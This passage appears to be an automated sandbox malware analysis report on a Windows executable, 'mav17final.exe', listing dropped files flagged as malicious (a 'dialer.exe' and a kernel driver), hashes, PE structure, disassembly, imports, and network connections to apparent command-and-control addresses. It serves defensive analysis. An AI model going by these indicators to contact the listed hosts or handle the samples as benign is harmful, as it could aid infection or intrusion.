                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hbq2zdhu.rbm.psm1

                                                Download File
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_n3fjs40g.35n.psm1

                                                Download File
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_s2c2yfnl.afr.psm1

                                                Download File
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_st2rmehi.aca.ps1

                                                Download File
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_u5xvzv1b.wlq.ps1

                                                Download File
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vl4btnma.ysy.psm1

                                                Download File
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zehfj24n.npl.ps1

                                                Download File
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                C:\Users\user\AppData\Local\Temp\dialer.exe

                                                Download File
                                                Process:C:\Users\user\Desktop\mav17final.exe
                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                Category:dropped
                                                Size (bytes):5290264
                                                Entropy (8bit):6.532307554125056
                                                Encrypted:false
                                                SSDEEP:98304:CoTBOZ1ed7R/gyE5hIblWsTvMq/tjafGriRNUP8lw:CoTBOvayyE3IblWKPljafGDaw
                                                MD5:0BCBEA7313655A42ECC0A1FDBCF37993
                                                SHA1:4262E7F1A051C50C0145CE932EC261E6B93F387E
                                                SHA-256:B63F00D14E4EDC4A5B63E48D3836DA41D3567BBEACB84322B054DD5B2A25A600
                                                SHA-512:11D99F7E31E65A3A0E2C63AAA9F0476EF3835BBBB96181043A642AC11503E7DA3DED331E5FD0F5D4A66951F674C14B6693434DE337B35ED77AFE0E21D49B3B7E
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                • Antivirus: ReversingLabs, Detection: 79%
                                                • Antivirus: Virustotal, Detection: 65%, Browse
                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d.....Gf.........."...........O.....@..........@..............................Q...........`.....................................................<.............P.......P..)....Q.h...............................(.......8............................................text...f........................... ..`.rdata..|B.......D..................@..@.data.....O.......O.................@....pdata........P.......P.............@..@.00cfg........P.......P.............@..@.tls..........P.......P.............@....reloc..h.....Q.......P.............@..B................................................................................................................................................................................................................................................................................................................................................

                                                C:\Users\user\AppData\Local\Temp\r3vkitn7

                                                Download File
                                                Process:C:\Users\user\Desktop\mav17final.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):4
                                                Entropy (8bit):2.0
                                                Encrypted:false
                                                SSDEEP:3:qn:qn
                                                MD5:3F1D1D8D87177D3D8D897D7E421F84D6
                                                SHA1:DD082D742A5CB751290F1DB2BD519C286AA86D95
                                                SHA-256:F02285FB90ED8C81531FE78CF4E2ABB68A62BE73EE7D317623E2C3E3AEFDFFF2
                                                SHA-512:2AE2B3936F31756332CA7A4B877D18F3FCC50E41E9472B5CD45A70BEA82E29A0FA956EE6A9EE0E02F23D9DB56B41D19CB51D88AAC06E9C923A820A21023752A9
                                                Malicious:false
                                                Preview:blat

                                                C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                Download File
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):64
                                                Entropy (8bit):1.1510207563435464
                                                Encrypted:false
                                                SSDEEP:3:NlllulvX/Z:NllUvX
                                                MD5:E55E6E0E1AB6A345A7BCC5FD9C39F70C
                                                SHA1:E5344BE0ED383244752DD96C35183014062EB114
                                                SHA-256:9635856D4CAE632D612BDD5736CEA8F6B6AEEBD6FE3AEB04A842FBDB386BCC91
                                                SHA-512:74908F7F2D21452483A47A25A5728B9211215C6DB2591E94806E477B6B870C92BCE7E11D64A6E9B4AB225927869AD5440ED2995CCA42FD6C8612B027F994A2A5
                                                Malicious:false
                                                Preview:@...e................................................@..........

                                                C:\Windows\Temp\__PSScriptPolicyTest_fmmoe5wr.s0x.ps1

                                                Download File
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                C:\Windows\Temp\__PSScriptPolicyTest_nngzqssd.l31.ps1

                                                Download File
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                C:\Windows\Temp\__PSScriptPolicyTest_q3kzzrsb.vce.psm1

                                                Download File
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                C:\Windows\Temp\__PSScriptPolicyTest_upgz5sqy.leu.psm1

                                                Download File
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                C:\Windows\Temp\ujjtjyeszdwn.sys

                                                Download File
                                                Process:C:\ProgramData\dialer.exe
                                                File Type:PE32+ executable (native) x86-64, for MS Windows
                                                Category:dropped
                                                Size (bytes):14544
                                                Entropy (8bit):6.2660301556221185
                                                Encrypted:false
                                                SSDEEP:192:nqjKhp+GQvzj3i+5T9oGYJh1wAoxhSF6OOoe068jSJUbueq1H2PIP0:qjKL+v/y+5TWGYOf2OJ06dUb+pQ
                                                MD5:0C0195C48B6B8582FA6F6373032118DA
                                                SHA1:D25340AE8E92A6D29F599FEF426A2BC1B5217299
                                                SHA-256:11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
                                                SHA-512:AB28E99659F219FEC553155A0810DE90F0C5B07DC9B66BDA86D7686499FB0EC5FDDEB7CD7A3C5B77DCCB5E865F2715C2D81F4D40DF4431C92AC7860C7E01720D
                                                Malicious:true
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5:n.q[..q[..q[..q[..}[..V.{.t[..V.}.p[..V.m.r[..V.q.p[..V.|.p[..V.x.p[..Richq[..................PE..d....&.H.........."..................P.......................................p..............................................................dP..<....`.......@..`...................p ............................................... ..p............................text............................... ..h.rdata..|.... ......................@..H.data........0......................@....pdata..`....@......................@..HINIT...."....P...................... ....rsrc........`......................@..B................................................................................................................................................................................................................................................................................

                                                Static File Info

                                                General

                                                File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                Entropy (8bit):7.974540085861685
                                                TrID:
                                                • Win64 Executable GUI (202006/5) 77.37%
                                                • InstallShield setup (43055/19) 16.49%
                                                • Win64 Executable (generic) (12005/4) 4.60%
                                                • Generic Win/DOS Executable (2004/3) 0.77%
                                                • DOS Executable Generic (2002/1) 0.77%
                                                File name:mav17final.exe
                                                File size:13'827'522 bytes
                                                MD5:9e77a1c36b7ee264c38b958963769c08
                                                SHA1:eb7ad58040a6dbf826a37d52c26f7ce8ef963342
                                                SHA256:f1836d3e4c6916cdc1f873b430d0a2784885e587683f6917fd51c04eba18933c
                                                SHA512:cb4867e6d1eac352c59285e5b51128a54347e0780826b9c8221e516d650aa815d518591c8d4594a09b0ef331da29a9b49c0cab47987d035abda32f599be06cff
                                                SSDEEP:196608:XiwmU0yb8PHvOzg5dpsYjAu3toeQXs5S+9HIG3/htx4FMIZETSvjPePdrQJ/B2nw:ywuky7h/QXs4+9H7/DxQETSvvJsWp1
                                                TLSH:09D6338AE1B149D9D8538138E0D7D814EA72A877173CA2CB07F8645A1F93DA5B43FF60
                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........f.................................................................................!...n.......n.......Rich...................

                                                File Icon

                                                Icon Hash:4a464cd47461e179

                                                Static PE Info

                                                General

                                                Entrypoint:0x14000c120
                                                Entrypoint Section:.text
                                                Digitally signed:false
                                                Imagebase:0x140000000
                                                Subsystem:windows gui
                                                Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                Time Stamp:0x6647B2D2 [Fri May 17 19:41:06 2024 UTC]
                                                TLS Callbacks:
                                                CLR (.Net) Version:
                                                OS Version Major:5
                                                OS Version Minor:2
                                                File Version Major:5
                                                File Version Minor:2
                                                Subsystem Version Major:5
                                                Subsystem Version Minor:2
                                                Import Hash:8cab86c0c05962691d7150b4577bcb22

                                                Entrypoint Preview

                                                Instruction
                                                dec eax
                                                sub esp, 28h
                                                call 00007F66707FC5FCh
                                                dec eax
                                                add esp, 28h
                                                jmp 00007F66707FC20Fh
                                                int3
                                                int3
                                                int3
                                                int3
                                                int3
                                                int3
                                                int3
                                                int3
                                                int3
                                                int3
                                                int3
                                                int3
                                                int3
                                                int3
                                                dec eax
                                                sub esp, 28h
                                                call 00007F66707FCB6Ch
                                                test eax, eax
                                                je 00007F66707FC3B3h
                                                dec eax
                                                mov eax, dword ptr [00000030h]
                                                dec eax
                                                mov ecx, dword ptr [eax+08h]
                                                jmp 00007F66707FC397h
                                                dec eax
                                                cmp ecx, eax
                                                je 00007F66707FC3A6h
                                                xor eax, eax
                                                dec eax
                                                cmpxchg dword ptr [0002F2ECh], ecx
                                                jne 00007F66707FC380h
                                                xor al, al
                                                dec eax
                                                add esp, 28h
                                                ret
                                                mov al, 01h
                                                jmp 00007F66707FC389h
                                                int3
                                                int3
                                                int3
                                                inc eax
                                                push ebx
                                                dec eax
                                                sub esp, 20h
                                                movzx eax, byte ptr [0002F2D7h]
                                                test ecx, ecx
                                                mov ebx, 00000001h
                                                cmove eax, ebx
                                                mov byte ptr [0002F2C7h], al
                                                call 00007F66707FC973h
                                                call 00007F66707FD8A6h
                                                test al, al
                                                jne 00007F66707FC396h
                                                xor al, al
                                                jmp 00007F66707FC3A6h
                                                call 00007F66708065A1h
                                                test al, al
                                                jne 00007F66707FC39Bh
                                                xor ecx, ecx
                                                call 00007F66707FD8B6h
                                                jmp 00007F66707FC37Ch
                                                mov al, bl
                                                dec eax
                                                add esp, 20h
                                                pop ebx
                                                ret
                                                int3
                                                int3
                                                int3
                                                inc eax
                                                push ebx
                                                dec eax
                                                sub esp, 20h
                                                cmp byte ptr [0002F28Ch], 00000000h
                                                mov ebx, ecx
                                                jne 00007F66707FC3F9h
                                                cmp ecx, 01h
                                                jnbe 00007F66707FC3FCh
                                                call 00007F66707FCAD2h
                                                test eax, eax
                                                je 00007F66707FC3BAh

                                                Data Directories

                                                NameVirtual AddressVirtual Size Is in Section
                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x376980x78.rdata
                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x400000xf41c.rsrc
                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x3d0000x1f8c.pdata
                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x500000x744.reloc
                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x352400x1c.rdata
                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x352600x138.rdata
                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_IAT0x260000x3f0.rdata
                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                Sections

                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                .text0x10000x24a500x24c00190401f1858eb6aaed68cca57ff70033False0.5661405187074829data6.455391595300264IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                .rdata0x260000x124360x12600abc6ef004a61808e8c901134e626778dFalse0.5113732993197279data5.80002704943681IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                .data0x390000x32d80xe00dac4e1626398bdbc8a43bbcc545bcd82False0.12081473214285714Matlab v4 mat-file (little endian) f\324\377\3772\242\337-\231+, text, rows 4294967295, columns 01.6410831953198595IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                .pdata0x3d0000x1f8c0x2000c6a690e6bf8e4d77e321ba617d08976cFalse0.4898681640625data5.373634709528991IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                _RDATA0x3f0000xf40x200b24eb920d09e236e1ccadd6d5fcfc5e5False0.30078125data1.9987359274801832IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                .rsrc0x400000xf41c0xf600487cbb22a6e528b8aebe8a492c305f70False0.8030360772357723data7.554916050251791IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                .reloc0x500000x7440x80072cbe79325b6c2b3fedfaab9b7d68de5False0.54736328125data5.2312775503476825IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                Resources

                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                RT_ICON0x402080xea8Device independent bitmap graphic, 48 x 96 x 8, image size 00.585820895522388
                                                RT_ICON0x410b00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 00.7360108303249098
                                                RT_ICON0x419580x568Device independent bitmap graphic, 16 x 32 x 8, image size 00.755057803468208
                                                RT_ICON0x41ec00x952cPNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9975384937676757
                                                RT_ICON0x4b3ec0x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 00.3887966804979253
                                                RT_ICON0x4d9940x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 00.49530956848030017
                                                RT_ICON0x4ea3c0x468Device independent bitmap graphic, 16 x 32 x 32, image size 00.7207446808510638
                                                RT_GROUP_ICON0x4eea40x68data0.7019230769230769
                                                RT_MANIFEST0x4ef0c0x50dXML 1.0 document, ASCII text0.4694508894044857

                                                Imports

                                                DLLImport
                                                USER32.dllCreateWindowExW, MessageBoxW, MessageBoxA, SystemParametersInfoW, DestroyIcon, SetWindowLongPtrW, GetWindowLongPtrW, GetClientRect, InvalidateRect, ReleaseDC, GetDC, DrawTextW, GetDialogBaseUnits, EndDialog, DialogBoxIndirectParamW, MoveWindow, SendMessageW
                                                COMCTL32.dll
                                                KERNEL32.dllIsValidCodePage, GetStringTypeW, GetFileAttributesExW, HeapReAlloc, FlushFileBuffers, GetCurrentDirectoryW, GetACP, GetOEMCP, GetModuleHandleW, MulDiv, GetLastError, SetDllDirectoryW, GetModuleFileNameW, CreateSymbolicLinkW, GetProcAddress, GetCommandLineW, GetEnvironmentVariableW, GetCPInfo, ExpandEnvironmentStringsW, CreateDirectoryW, GetTempPathW, WaitForSingleObject, Sleep, GetExitCodeProcess, CreateProcessW, GetStartupInfoW, FreeLibrary, LoadLibraryExW, SetConsoleCtrlHandler, FindClose, FindFirstFileExW, CloseHandle, GetCurrentProcess, LocalFree, FormatMessageW, MultiByteToWideChar, WideCharToMultiByte, GetEnvironmentStringsW, FreeEnvironmentStringsW, GetProcessHeap, GetTimeZoneInformation, HeapSize, WriteConsoleW, SetEndOfFile, SetEnvironmentVariableW, InitializeSListHead, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, IsDebuggerPresent, RtlUnwindEx, SetLastError, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, RaiseException, GetCommandLineA, CreateFileW, GetDriveTypeW, GetFileInformationByHandle, GetFileType, PeekNamedPipe, SystemTimeToTzSpecificLocalTime, FileTimeToSystemTime, GetFullPathNameW, RemoveDirectoryW, FindNextFileW, SetStdHandle, DeleteFileW, ReadFile, GetStdHandle, WriteFile, ExitProcess, GetModuleHandleExW, HeapFree, GetConsoleMode, ReadConsoleW, SetFilePointerEx, GetConsoleOutputCP, GetFileSizeEx, HeapAlloc, CompareStringW, LCMapStringW
                                                ADVAPI32.dllOpenProcessToken, GetTokenInformation, ConvertStringSecurityDescriptorToSecurityDescriptorW, ConvertSidToStringSidW
                                                GDI32.dllSelectObject, DeleteObject, CreateFontIndirectW

                                                Network Behavior

                                                Network Port Distribution

                                                TCP Packets

                                                TimestampSource PortDest PortSource IPDest IP
                                                May 22, 2024 06:46:08.590037107 CEST497047752192.168.2.577.105.166.179
                                                May 22, 2024 06:46:08.595204115 CEST77524970477.105.166.179192.168.2.5
                                                May 22, 2024 06:46:08.595328093 CEST497047752192.168.2.577.105.166.179
                                                May 22, 2024 06:46:08.595719099 CEST497047752192.168.2.577.105.166.179
                                                May 22, 2024 06:46:08.645519018 CEST77524970477.105.166.179192.168.2.5
                                                May 22, 2024 06:46:09.244663000 CEST77524970477.105.166.179192.168.2.5
                                                May 22, 2024 06:46:09.245604992 CEST497047752192.168.2.577.105.166.179
                                                May 22, 2024 06:46:09.250715017 CEST77524970477.105.166.179192.168.2.5
                                                May 22, 2024 06:46:09.437483072 CEST77524970477.105.166.179192.168.2.5
                                                May 22, 2024 06:46:09.486382961 CEST497047752192.168.2.577.105.166.179
                                                May 22, 2024 06:46:09.745457888 CEST49705443192.168.2.5188.114.96.3
                                                May 22, 2024 06:46:09.745543957 CEST44349705188.114.96.3192.168.2.5
                                                May 22, 2024 06:46:09.745675087 CEST49705443192.168.2.5188.114.96.3
                                                May 22, 2024 06:46:09.757550955 CEST49705443192.168.2.5188.114.96.3
                                                May 22, 2024 06:46:09.757621050 CEST44349705188.114.96.3192.168.2.5
                                                May 22, 2024 06:46:10.255955935 CEST44349705188.114.96.3192.168.2.5
                                                May 22, 2024 06:46:10.258919954 CEST49705443192.168.2.5188.114.96.3
                                                May 22, 2024 06:46:10.258975983 CEST44349705188.114.96.3192.168.2.5
                                                May 22, 2024 06:46:10.261204004 CEST44349705188.114.96.3192.168.2.5
                                                May 22, 2024 06:46:10.261296988 CEST49705443192.168.2.5188.114.96.3
                                                May 22, 2024 06:46:10.263529062 CEST49705443192.168.2.5188.114.96.3
                                                May 22, 2024 06:46:10.263628960 CEST44349705188.114.96.3192.168.2.5
                                                May 22, 2024 06:46:10.265213966 CEST49705443192.168.2.5188.114.96.3
                                                May 22, 2024 06:46:10.265233994 CEST44349705188.114.96.3192.168.2.5
                                                May 22, 2024 06:46:10.314538002 CEST49705443192.168.2.5188.114.96.3
                                                May 22, 2024 06:46:10.664393902 CEST44349705188.114.96.3192.168.2.5
                                                May 22, 2024 06:46:10.664561987 CEST44349705188.114.96.3192.168.2.5
                                                May 22, 2024 06:46:10.664635897 CEST49705443192.168.2.5188.114.96.3
                                                May 22, 2024 06:46:10.716418982 CEST49705443192.168.2.5188.114.96.3
                                                May 22, 2024 06:46:10.716474056 CEST44349705188.114.96.3192.168.2.5
                                                May 22, 2024 06:46:10.716509104 CEST49705443192.168.2.5188.114.96.3
                                                May 22, 2024 06:46:10.730782986 CEST497047752192.168.2.577.105.166.179
                                                May 22, 2024 06:46:10.731177092 CEST497067752192.168.2.577.105.166.179
                                                May 22, 2024 06:46:10.736495018 CEST77524970477.105.166.179192.168.2.5
                                                May 22, 2024 06:46:10.736669064 CEST497047752192.168.2.577.105.166.179
                                                May 22, 2024 06:46:10.741303921 CEST77524970677.105.166.179192.168.2.5
                                                May 22, 2024 06:46:10.742410898 CEST497067752192.168.2.577.105.166.179
                                                May 22, 2024 06:46:13.178421021 CEST497067752192.168.2.577.105.166.179
                                                May 22, 2024 06:46:13.183476925 CEST77524970677.105.166.179192.168.2.5
                                                May 22, 2024 06:46:13.371711969 CEST77524970677.105.166.179192.168.2.5
                                                May 22, 2024 06:46:13.372385025 CEST497067752192.168.2.577.105.166.179
                                                May 22, 2024 06:46:13.377379894 CEST77524970677.105.166.179192.168.2.5
